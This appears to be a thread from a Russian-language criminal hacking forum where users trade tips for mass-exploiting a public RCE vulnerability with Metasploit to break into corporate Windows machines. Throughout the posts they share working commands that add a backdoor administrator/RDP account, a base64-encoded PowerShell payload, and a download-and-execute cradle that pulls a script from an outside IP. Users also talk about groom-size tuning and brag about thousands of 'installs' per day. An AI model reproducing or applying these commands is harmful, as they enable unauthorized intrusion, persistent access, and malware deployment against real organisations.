• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Добываем доступы в корпы через паблик RCE

Отслеживать
Пожалуйста, обратите внимание, что пользователь заблокирован
Chairman сказал(а):
что то такое пробовал тоже, помню не получалось , но у меня отличия в одной команде

пробовал что то типа

shell
net user admin1 mar3porA /add
net localgroup administrators admin1 /add
net accounts /maxpwage:unlimited
net accounts /forcelogoff:no

пойдут свежие сессии, попробую твой вариант

спасибо
язык тоже нужно учитывать, группа будет по-другому называться на разных языках, поищи скрипт, который по sid делает или же
net group /domain
 
Взял несколько тысяч уязвимых IP на недефолт порте, несколько часов долблю их, ни 1 сессии не прилетело. Большая часть с ошибкой exploit failed disconnected errno econnreset connection reset by peer. Там где проходит, сессию не создает. Грум сайз 50, так же пробовал в начале 156.
Так же вопрос про таймаут, сколько ставить?
 
Последнее редактирование:
Chairman сказал(а):
ок. задам по другому.
как создать нового пользователя для rdp соединения ?
Создается рдп пользователь так
net user Admins sfsdfsd23423 /add; net localgroup (Get-WmiObject -Class Win32_Group -Filter "LocalAccount = True AND SID = 'S-1-5-32-544'").Name Admins /add;
логин Admins пароль sfsdfsd23423

Если хотите на полном автомате то нам нужен PAYLOAD windows/x64/exec и будем использовать powershell в кали пишим pwsh далее нам нужно закодировать строку в Base64

[Convert]::toBase64String([System.Text.Encoding]::Unicode.GetBytes("net user Admins sfsdfsd23423 /add; net localgroup (Get-WmiObject -Class Win32_Group -Filter 'LocalAccount = True AND SID = 'S-1-5-32-544'").Name Admins /add;'))

После этого прописываем set CMD powershell.exe -noP -sta -w 1 -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgB и т.д
Я бы предложил прописать в powershell скрипт (powershell.exe -noP -sta -w 1 -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgB) и залить на сервер чтобы видеть какой ip качает и знать где учетка создалась а качать скрипт powershell так
Invoke-Expression (New-Object Net.WebClient).DownloadString("http://1.1.1.1/12.ps1"); но прежде так же закодировать

Если время будет и желание напишу как все сделать на полном автомате с данного эксплоита выходило делать по несколько К инсталов в день.
Хотите реально нормальную скорость работы, перепишите сам скрипт на ruby тот что в начале статьи и будете сильно удивлены что метасплоит так может быстро работать.
 
Последнее редактирование:
Pent сказал(а):
Создается рдп пользователь так
net user Admins sfsdfsd23423 /add; net localgroup (Get-WmiObject -Class Win32_Group -Filter "LocalAccount = True AND SID = 'S-1-5-32-544'").Name Admins /add;
логин Admins пароль sfsdfsd23423

Если хотите на полном автомате то нам нужен PAYLOAD windows/x64/exec и будем использовать powershell в кали пишим pwsh далее нам нужно закодировать строку в Base64

[Convert]::toBase64String([System.Text.Encoding]::Unicode.GetBytes("net user Admins sfsdfsd23423 /add; net localgroup (Get-WmiObject -Class Win32_Group -Filter 'LocalAccount = True AND SID = 'S-1-5-32-544'").Name Admins /add;'))

После этого прописываем set CMD powershell.exe -noP -sta -w 1 -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgB и т.д
Я бы предложил прописать в powershell скрипт (powershell.exe -noP -sta -w 1 -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgB) и залить на сервер чтобы видеть какой ip качает и знать где учетка создалась а качать скрипт powershell так
Invoke-Expression (New-Object Net.WebClient).DownloadString("http://1.1.1.1/12.ps1"); но прежде так же закодировать

Если время будет и желание напишу как все сделать на полном автомате с данного эксплоита выходило делать по несколько К инсталов в день.
Хотите реально нормальную скорость работы, перепишите сам скрипт на ruby тот что в начале статьи и будете сильно удивлены что метасплоит так может быстро работать.
на полном автомате для меня еще рановато), все делаю в ручном режиме. не всегда удаеться добавить учетку в админскую группу, пока не понимаю почему. там язык не инглишь ) тяжело разобраться

за инфу спасибо, есть куда двигаться
 
slack25 сказал(а):
you mean 50, then 100 then 150 , 200 etc ?
yes, we are dumb we are not hackers like boris yeltin ,bassterlord , kerberos or whoever, we need to work more, i run 4 vps with metasploit to run lists on all day every day, results are there, u just need to work a lot
 
dictat0r сказал(а):
yes, we are dumb we are not hackers like boris yeltin ,bassterlord , kerberos or whoever, we need to work more, i run 4 vps with metasploit to run lists on all day every day, results are there, u just need to work a lot
You are right. But did u see that they are down after one attack? You wait to reconnect and then you put the next groomsize right ?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
I will tell u secret what BoricYelcin didnt told here
your GROOMSIZE actualy have to start from 500, than 1000, then 1500, till u reach 1 000 000
and u have to run at least 10 servers
Good Luck
(eto shytka)
v kagdei shytke est dolya shytki
 
lerato сказал(а):
I will tell u secret what BoricYelcin didnt told here
your GROOMSIZE actualy have to start from 500, than 1000, then 1500, till u reach 1 000 000
and u have to run at least 10 servers
Good Luck
(eto shytka)
v kagdei shytke est dolya shytki
What do you mean run at least 10 servers ?
 
slack25 сказал(а):
What do you mean run at least 10 servers ?

lerato сказал(а):
I will tell u secret what BoricYelcin didnt told here
your GROOMSIZE actualy have to start from 500, than 1000, then 1500, till u reach 1 000 000
and u have to run at least 10 servers
Good Luck
(eto shytka)
v kagdei shytke est dolya shytki
are you joking ?
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх